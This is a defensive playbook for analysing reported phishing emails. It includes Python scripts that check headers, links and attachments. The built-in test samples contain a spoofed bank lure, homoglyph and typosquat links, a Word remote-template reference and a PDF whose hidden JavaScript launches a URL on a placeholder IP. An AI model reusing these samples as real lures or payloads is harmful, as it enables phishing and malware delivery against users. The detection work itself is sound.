Overview
Phishing remains one of the most common initial access vectors, and every reported phishing email is an intelligence opportunity. This playbook provides step-by-step procedures for analyzing reported phishing emails, from header inspection through payload analysis and IOC extraction. Followed consistently, it turns user reports into actionable intelligence that improves your defenses.
Analysis Workflow
- Receive the reported email and preserve the original with full headers (as an attached .eml/.msg file, not a forwarded copy, which drops the original headers)
- Analyze email headers to identify the true sending infrastructure
- Inspect URLs without clicking: use a sandbox or URL expansion tools, never the analyst workstation
- Check sender reputation against threat intelligence and blocklists
- Analyze any attachments in a sandboxed environment
- Extract IOCs: sender domains, IPs, URLs, file hashes, email subjects; defang URLs and domains before pasting them into tickets or chat
- Determine the intent: credential harvesting, malware delivery, BEC, or reconnaissance
- Check if other users received the same or similar emails
- Take containment actions: block domains, quarantine matching emails, reset credentials if needed
- Document findings and close the ticket
Header Analysis Fields
| Header field | What to check | Red flags |
|---|---|---|
| Return-Path | Envelope sender (SMTP MAIL FROM) that receives bounces; SPF is evaluated against this domain, not the From header | Domain differs from the From address |
| Received | Relay chain and connecting IP; read bottom-up, but trust only the hops added by your own servers, since everything below them can be forged by the sender | Unknown relays, or a hop below your own edge server that contradicts the one above it |
| Authentication-Results | SPF, DKIM, DMARC verdicts in the header stamped by your own MTA (check the authserv-id at the start of the value) | fail or none on a sender that should authenticate; DKIM d= domain unrelated to the From domain |
| X-Originating-IP | Client IP recorded by some webmail providers; often absent and, like any header added before your edge, forgeable | IP in known malicious ranges, anonymizing VPNs, or bulletproof hosting |
| Reply-To | Where replies are directed | Different domain from the From address |
| Message-ID | Unique identifier, normally containing the domain of the host that generated the message | Domain unrelated to the sender (a weak signal on its own; mail-service providers legitimately set their own) |
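The checks in the table, applied to a raw message with Python's standard library. This is an added example, not tooling from the playbook: the sample message, host names, IP addresses and the assumed edge MTA name `mx.example.com` are constructed placeholders. The only Authentication-Results header it trusts is the one whose authserv-id matches your own MTA, and the only Received hop it trusts is the first one your own server wrote; the bottom hop is reported as the sender's claim, not as fact.

```python
"""Header triage for a reported phishing email (added example; not the playbook's own tooling).

Applies the header-table checks: Return-Path, Reply-To and Message-ID domains
against From, SPF/DKIM/DMARC verdicts from an Authentication-Results header
stamped by our own MTA, and the connecting IP from the first Received hop our
own server wrote. Sample message, hosts and IPs are constructed placeholders.
"""
import re
from email import policy
from email.parser import BytesParser
from email.utils import parseaddr

OUR_MTA = "mx.example.com"   # assumed authserv-id / hostname of your own edge MTA
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Constructed sample: spoofed From, Return-Path and Reply-To elsewhere, and a
# lower Received hop that only the sender vouches for.
SAMPLE_EML = b"""Return-Path: <bounce@mail-sender.example.net>
Received: from mail-sender.example.net (mail-sender.example.net [203.0.113.45])
\tby mx.example.com with ESMTPS id abc123; Mon, 3 Jun 2024 09:12:01 +0000
Received: from workstation (unknown [198.51.100.7])
\tby mail-sender.example.net with SMTP; Mon, 3 Jun 2024 09:11:58 +0000
Authentication-Results: mx.example.com; spf=fail smtp.mailfrom=mail-sender.example.net;
\tdkim=none; dmarc=fail header.from=trusted-bank.example
From: "Trusted Bank Security" <alerts@trusted-bank.example>
Reply-To: support@trusted-bank-help.example.org
Message-ID: <20240603091158.7f3a@mail-sender.example.net>
To: victim@example.com
Subject: Urgent: verify your account
Content-Type: text/plain; charset=utf-8

Your account is locked. Reply with your password to restore access.
"""


def _flat(value):
    """Unfold a header value and collapse whitespace."""
    return re.sub(r"\s+", " ", str(value or "")).strip()


def _domain_of(header_value):
    """Lowercase domain of the first address in an address header ('' if none)."""
    return parseaddr(_flat(header_value))[1].rpartition("@")[2].lower()


def parse_auth_results(value):
    """Return (authserv-id, {method: verdict}) from an Authentication-Results header."""
    authserv_id, _, rest = _flat(value).partition(";")
    verdicts = {m.lower(): v.lower() for m, v in re.findall(r"\b(spf|dkim|dmarc)=(\w+)", rest, re.I)}
    return authserv_id.strip().lower(), verdicts


def trace_received(received, our_mta):
    """received is top-down (newest hop first). Returns (connecting_ip, claimed_origin_ip)."""
    connecting = None
    for hop in received:
        if re.search(rf"\bby {re.escape(our_mta)}\b", _flat(hop), re.I):
            m = IP_RE.search(_flat(hop))
            connecting = m.group(1) if m else None
            break                       # everything below this hop is untrusted
    m = IP_RE.search(_flat(received[-1])) if received else None
    return connecting, (m.group(1) if m else None)


def triage_headers(raw, our_mta=OUR_MTA):
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    from_domain = _domain_of(msg.get("From"))
    rp, reply = _domain_of(msg.get("Return-Path")), _domain_of(msg.get("Reply-To"))
    mid_match = re.search(r"@([^>\s]+)", _flat(msg.get("Message-ID")))
    mid = mid_match.group(1).lower() if mid_match else ""
    authserv_id, auth = parse_auth_results(msg.get("Authentication-Results"))
    connecting, claimed = trace_received(msg.get_all("Received", []), our_mta)

    flags = []
    if rp and rp != from_domain:
        flags.append(f"Return-Path domain {rp} differs from From domain {from_domain}")
    if reply and reply != from_domain:
        flags.append(f"Reply-To domain {reply} differs from From domain {from_domain}")
    if mid and mid != from_domain:
        flags.append(f"Message-ID domain {mid} differs from From domain (weak: ESPs do this legitimately)")
    if authserv_id != our_mta.lower():
        flags.append(f"Authentication-Results stamped by {authserv_id!r}, not {our_mta}; treat as untrusted")
    else:
        for method in ("spf", "dkim", "dmarc"):
            verdict = auth.get(method, "missing")
            if verdict != "pass":
                flags.append(f"{method}={verdict} for From domain {from_domain}")
    return {"from_domain": from_domain, "return_path_domain": rp, "reply_to_domain": reply,
            "message_id_domain": mid, "auth": auth, "connecting_ip": connecting,
            "claimed_origin_ip": claimed, "red_flags": flags}


if __name__ == "__main__":
    for line in triage_headers(SAMPLE_EML)["red_flags"]:
        print("-", line)
```

On the sample the connecting IP (203.0.113.45) is what your server actually saw; the bottom hop (198.51.100.7) is whatever the sender chose to write, which is why the two are reported separately. Note that SPF is checked against the Return-Path domain, so a passing SPF on a spoofed From is exactly what `dmarc=fail` with `spf=pass` looks like.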
URL and Link Analysis
Never click links directly. Copy the URL, defang it for the ticket, and analyze it in a sandboxed tool such as URLScan, VirusTotal, or your SOAR platform. Look for domain spoofing techniques: typosquatting, homoglyph and IDN (punycode) attacks, and subdomain abuse, where the real brand name appears as a subdomain of an attacker-controlled domain. Check when the domain was registered, because newly created domains are a strong phishing indicator. Expand URL shorteners before analysis, and do it from the sandbox rather than the analyst's workstation. Compare the visible text of the link with the actual href destination and flag mismatches. Pay attention to redirect chains that pass through several domains before the final landing page, and remember that a page which fingerprints its visitors may serve the sandbox a benign decoy.
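The link checks above in code, as an added example that is not part of the playbook. It extracts every anchor from an HTML body, compares visible text with the real href, and flags brand-in-subdomain abuse, IDN or homoglyph hosts, typosquats within edit distance 2 of a protected brand, and known URL shorteners, then defangs each URL for reporting. It never touches the network (shortener expansion and registration-date lookups belong in the sandbox). The brand list `trusted-bank.example`, the attacker hosts and the HTML body are constructed for the example; the registered-domain helper uses the last two labels, which is an assumption that a Public Suffix List library should replace in production.

```python
"""Link triage for a phishing email body (added example, not from the playbook).

Offline checks only: text/href mismatch, brand hidden in a subdomain, IDN or
homoglyph hosts, typosquats near a protected brand, and URL shorteners.
Brand list, hosts and HTML are constructed for the example.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

BRANDS = {"trusted-bank.example"}                      # placeholder brand you protect
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "is.gd", "rebrand.ly"}

# Constructed body: one legitimate link and four malicious patterns.
SAMPLE_HTML = """
<p>Your account has been limited. Please review:</p>
<a href="https://secure-login.trusted-bank.example.attacker-host.example">https://trusted-bank.example/login</a><br>
<a href="http://trusted-b\u0430nk.example/verify">Verify now</a><br>
<a href="https://trusted-bamk.example/reset?u=1">Reset password</a><br>
<a href="https://bit.ly/3abc">Click here</a><br>
<a href="https://trusted-bank.example/help">Help centre</a>
"""


class _AnchorCollector(HTMLParser):
    """Collect (href, visible text) pairs with a real parser, not a regex."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host):
    """Last two labels. Assumption for the example; use a Public Suffix List
    library (e.g. tldextract) in production so suffixes like co.uk work."""
    return ".".join(host.lower().split(".")[-2:])


def edit_distance(a, b):
    """Levenshtein distance, used to spot one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def defang(url):
    """Render a URL safe to paste into tickets and chat (hxxp, [.])."""
    p = urlparse(url)
    host = (p.hostname or "").replace(".", "[.]")
    return f"{p.scheme.replace('http', 'hxxp')}://{host}{p.path}" + (f"?{p.query}" if p.query else "")


def analyze_link(href, text, brands=BRANDS):
    host = (urlparse(href).hostname or "").lower()
    reg = registered_domain(host)
    flags = []
    text_host = urlparse(text).hostname          # None unless the visible text is itself a URL
    if text_host and text_host.lower() != host:
        flags.append("text_href_mismatch")
    labels = host.split(".")
    if any(label.startswith("xn--") for label in labels) or not host.isascii():
        flags.append("homoglyph_or_idn")
    for brand in brands:
        if reg == brand:
            continue                             # the genuine domain, nothing to flag
        if brand.split(".")[0] in labels:
            flags.append("brand_in_subdomain")
        if 0 < edit_distance(reg, brand) <= 2:
            flags.append("typosquat")
    if reg in SHORTENERS:
        flags.append("url_shortener")
    return {"href": href, "defanged": defang(href), "host": host, "registered_domain": reg, "flags": flags}


def analyze_links(html_body, brands=BRANDS):
    parser = _AnchorCollector()
    parser.feed(html_body)
    return [analyze_link(href, text, brands) for href, text in parser.links]


if __name__ == "__main__":
    for r in analyze_links(SAMPLE_HTML):
        print(r["defanged"], r["flags"])
```

The second link uses a Cyrillic "а" (U+0430) in place of the Latin letter, which is why it trips both the IDN check and the typosquat check; a mail client would display it identically to the real brand. The visible text of the first link is a genuine-looking URL while the href lands on `attacker-host.example`, the mismatch the text above tells you to flag.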
Attachment Analysis
- Submit attachments to a malware sandbox for behavioral analysis before opening them
- Check file hashes against threat intelligence databases and VirusTotal (look up the hash rather than uploading documents that may contain internal data)
- Analyze file metadata for suspicious properties: authorship, creation tools, hidden macros
- For Office documents, check for embedded macros, OLE objects, and external template references
- For PDFs, inspect for embedded JavaScript, launch actions, and suspicious form fields
- For archive files (ZIP, RAR, 7z), check for password protection (often noted in the email body) and nested payloads
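A static pre-check that covers the attachment list above, added here as an example rather than the playbook's own tooling. It hashes the file, then looks for the structural markers the list names: a VBA macro stream and an external template relationship in Office Open XML documents, JavaScript, Launch and OpenAction names in PDFs (after undoing the `#xx` name escapes attackers use to hide them), and the encrypted bit plus nested archives or executables in zip files. The three sample files are built in memory and are constructed for the example; the remote template URL and file names are placeholders. This decides what to look at first; behavioral analysis still happens in the sandbox.

```python
"""Static attachment triage (added example; not the playbook's own tooling).

Hash, detect type, and report structural red flags for Office Open XML, PDF
and zip attachments. All three samples are constructed in memory.
"""
import hashlib
import io
import re
import zipfile

ARCHIVE_EXT = (".zip", ".rar", ".7z", ".iso", ".img", ".cab")
EXEC_EXT = (".exe", ".scr", ".js", ".vbs", ".hta", ".lnk", ".bat", ".ps1", ".dll")
# Relationship type that makes Word fetch a remote template (.dotm) on open.
ATTACHED_TEMPLATE = b"relationships/attachedTemplate"
PDF_FLAGS = {
    rb"/JavaScript\b": "javascript", rb"/JS\b": "javascript",
    rb"/Launch\b": "launch_action", rb"/OpenAction\b": "open_action",
    rb"/AA\b": "auto_action", rb"/AcroForm\b": "form_fields",
    rb"/EmbeddedFile\b": "embedded_file",
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def _unescape_pdf_names(data):
    """PDF names may hide keywords as /J#61vaScript; undo #xx escapes before searching."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)


def inspect_pdf(data):
    text = _unescape_pdf_names(data)
    return sorted({flag for pat, flag in PDF_FLAGS.items() if re.search(pat, text)})


def inspect_zip(data):
    """Zip checks: Office macro/template markers, encryption bit, nested payloads."""
    flags, kind = set(), "zip"
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if "[Content_Types].xml" in zf.namelist():
            kind = "office-openxml"
        for info in zf.infolist():
            lower = info.filename.lower()
            encrypted = bool(info.flag_bits & 0x1)      # general-purpose bit 0
            if encrypted:
                flags.add("password_protected")
            if lower.endswith("vbaproject.bin"):
                flags.add("vba_macro")
            if "/embeddings/" in lower or "oleobject" in lower:
                flags.add("ole_object")
            if lower.endswith(ARCHIVE_EXT):
                flags.add("nested_archive")
            if lower.endswith(EXEC_EXT):
                flags.add("executable_inside")
            if lower.endswith(".rels") and not encrypted:
                rels = zf.read(info.filename)
                if ATTACHED_TEMPLATE in rels and b'TargetMode="External"' in rels:
                    flags.add("external_template")
    return kind, sorted(flags)


def triage_attachment(filename, data):
    """Return hash, detected type and structural red flags for one attachment."""
    result = {"filename": filename, "sha256": sha256_hex(data), "type": "unknown", "flags": []}
    if data.startswith(b"%PDF"):
        result["type"], result["flags"] = "pdf", inspect_pdf(data)
    elif data.startswith(b"PK\x03\x04"):
        result["type"], result["flags"] = inspect_zip(data)
    return result


def _build_sample_docm():
    """Constructed Word file with a macro stream and a remote template relationship."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder OLE stream")
        zf.writestr("word/_rels/settings.xml.rels",
                    '<Relationships><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
                    'officeDocument/2006/relationships/attachedTemplate" '
                    'Target="http://203.0.113.10/template.dotm" TargetMode="External"/></Relationships>')
    return buf.getvalue()


def _build_sample_encrypted_zip():
    """Constructed archive with an executable and a nested zip; encrypted bit set by patching headers."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2024.exe", b"MZ placeholder")
        zf.writestr("more.zip", b"PK placeholder")
    raw = bytearray(buf.getvalue())
    for sig, off in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):   # local / central header flag offsets
        i = raw.find(sig)
        while i != -1:
            raw[i + off] |= 0x01
            i = raw.find(sig, i + 4)
    return bytes(raw)


SAMPLE_DOCM = _build_sample_docm()
SAMPLE_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
              b"2 0 obj << /S /J#61vaScript /JS (app.launchURL('http://203.0.113.10/p', true)) >> endobj\n"
              b"trailer << /Root 1 0 R >>\n%%EOF\n")
SAMPLE_ENCRYPTED_ZIP = _build_sample_encrypted_zip()

if __name__ == "__main__":
    for name, blob in (("invoice.docm", SAMPLE_DOCM), ("statement.pdf", SAMPLE_PDF), ("docs.zip", SAMPLE_ENCRYPTED_ZIP)):
        print(triage_attachment(name, blob))
```

The encrypted zip cannot be listed for `.rels` content, which is exactly the point of password-protected lures: the sandbox needs the password from the email body before it can see the payload, so the check records the flag and moves on rather than failing.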
Containment and Response
Once you confirm a phishing email is malicious, move fast. Search your email platform for all instances of the campaign by subject line, sender, Message-ID pattern, or unique body content, and quarantine or purge matching messages from all mailboxes. Block the malicious URLs and the sending infrastructure at the email gateway and web proxy. If the From address is a spoofed legitimate domain, block the infrastructure rather than the domain, or you will also block the real sender; the durable fix there is DMARC enforcement on your inbound policy. If any user clicked a link or opened an attachment, treat it as a potential compromise: reset their credentials, revoke active sessions, scan their endpoint, and check for post-exploitation activity. Report the IOCs to your threat intelligence platform so later emails from the same campaign are caught automatically.
Frequently Asked Questions
How should users report suspected phishing emails?
Provide a one-click "Report Phishing" button integrated into the email client. This forwards the original email with full headers directly to the SOC mailbox. Avoid telling users to forward emails manually, since a normal forward replaces the original headers with the user's own; if no button is available, have them attach the message as a file instead.
What tools are essential for phishing analysis?
An email header analyzer, URL sandbox (URLScan.io), file sandbox (Any.Run, Joe Sandbox), threat intelligence feeds (VirusTotal, AbuseIPDB), and your SOAR platform for automated enrichment and response actions.
How do we handle user credentials submitted to a phishing site?
Immediately reset the compromised credentials, revoke active sessions and refresh tokens, and force re-enrollment of MFA. Check for any sign-ins from suspicious IPs since the submission. Review mailbox rules (forwarding, auto-delete, and moves to obscure folders), newly registered MFA devices, and OAuth application consents that may have been added during the compromise. Notify the user and provide guidance.
Should we respond to every reported phishing email?
Yes. Even if a reported email turns out to be legitimate, acknowledge the user's report and thank them for their vigilance. This reinforces the reporting culture. Automate initial analysis where possible to handle high report volumes efficiently.
How do we track phishing campaign trends?
Maintain a phishing log that tracks sender domains, payload types, targeting patterns, and outcomes. Review trends monthly to identify campaigns targeting your organization and adjust email security controls accordingly.
